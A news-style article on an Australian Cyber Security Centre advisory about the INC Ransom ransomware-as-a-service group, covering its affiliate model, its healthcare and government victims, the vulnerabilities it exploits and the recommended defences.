When Australia’s cyber regulatory body issued a new advisory regarding INC Ransom, the global cybersecurity community took immediate notice. The attention was not due to INC being a fresh entity, but rather because its evolving business model has positioned it as one of the most persistent threats of 2025 that targets the fundamental infrastructures essential to societal function.
The Australian Cyber Security Centre (ACSC), which operates under the Australian Signals Directorate (ASD), circulated a warning that INC Ransom’s affiliate model is now empowering a diverse range of threat actors. These affiliates can launch attacks on critical infrastructure with little to no technical expertise. The implications of this are substantial, as the sectors targeted include vital areas such as healthcare and government networks, which are often integral to public safety and stability.
INC Ransom is categorized as a Ransomware-as-a-Service (RaaS) group, effectively functioning as a criminal franchise. In this model, core developers handle the creation and maintenance of the malware platform and then lease it to affiliates who perform the actual attacks, splitting the ransom rewards. This dark-web franchise approach allows for a diverse pool of perpetrators to inflict damage, with INC providing the technology while the affiliates conduct the break-ins.
By mid-2025, more than 200 victims were already cataloged on INC’s data leak site, and in July, INC earned the notorious distinction of being the most widely deployed ransomware based on reported victim incidents. This rapid ascension cannot be attributed to chance; it represents a strategically planned expansion, leveraged by affiliates who bring their access and skills from other hacking organizations.
The ACSC noted that healthcare organizations were disproportionately affected by INC’s operations between January and August 2025, with educational institutions and governmental agencies also among the top sectors targeted. The advisory articulated specific tactics used by INC affiliates, such as exploiting compromised accounts to infiltrate healthcare entities in Australia. After gaining access, these affiliates elevate their privileges to admin levels and navigate laterally within victim networks, indicating a high level of sophistication in their attack strategies.
In June, an alarming incident involving the Tongan Ministry of Health highlighted the severity of the threat. This ransomware attack not only interrupted essential services but also disrupted the national healthcare network. The ACSC confirmed that INC was responsible for this breach as well—a detail that speaks to the group’s expanding geographical footprint and its targeting of institutions that serve public health needs.
Remarkably, INC affiliates do not require groundbreaking methods to execute their plans. Instead, they exploit existing vulnerabilities present in commonly used enterprise software systems. Notable entry points include flaws such as CVE-2023-3519 in Citrix NetScaler, a remote code execution vulnerability, and CVE-2023-48788, a SQL injection glitch in Fortinet Endpoint Management Server. These unpatched vulnerabilities become gateways for affiliates, allowing them easy access to critical systems without the need for complex hacking techniques.
Once inside a victim’s network, INC affiliates follow a systematic method. They compress data before exfiltration, use AES encryption for secure communications, and ensure that ransom notes are prominently displayed on affected network printers. In a strategy known as double extortion, they encrypt files while threatening to publish stolen information if a ransom is not paid promptly.
In one high-profile breach, INC Ransom claimed to have infiltrated the Pennsylvania Office of the Attorney General in August 2025, allegedly exfiltrating over five terabytes of sensitive data and asserting that they had also accessed federal networks. This incident showcases the audacity of the group and the growing concern surrounding the security of government entities.
The nefarious reach of INC Ransom extends well beyond U.S. borders, reaching into the U.K. with high-profile targets such as Alder Hey Children’s NHS Foundation Trust. Reports indicate that the group has obtained vast patient records and procurement data, reflecting a calculated strategy designed to exploit public-sector healthcare institutions that often operate under tight budget constraints for cybersecurity.
Microsoft’s Threat Intelligence team has been tracking significant activity from INC affiliates, particularly a group identified as Vanilla Tempest, which pivoted to using INC Ransom as its primary payload. This adaptability among hacking groups evidences a fundamental characteristic of the RaaS model, where affiliates seek the most effective tools and readily adapt them in response to external pressures like law enforcement scrutiny.
In response to the escalating threats posed by ransomware, Australia has introduced a regulatory framework that mandates organizations with an annual revenue exceeding $3 million to report ransomware or extortion payments within 72 hours. This strategic move aims to disrupt the financial incentives that sustain groups like INC Ransom.
To combat the evolving landscape of cyber threats, the ACSC has issued recommendations for network defenders. Key strategies include prioritizing the patching of internet-facing systems, implementing phishing-resistant multifactor authentication, segmenting networks to limit lateral movement, and monitoring for unusual usage patterns of legitimate administrative tools like PowerShell and Remote Desktop Protocol.
As INC Ransom continues to operate and expand its influence, it is crucial for cybersecurity professionals to remain vigilant. Notably, elements of INC’s operations have also been connected to the development of Lynx ransomware, indicating that the threat landscape may soon extend well beyond INC’s immediate branding. This evolution highlights that effectively neutralizing INC today may not prevent the emergence of new threats bearing similar characteristics tomorrow.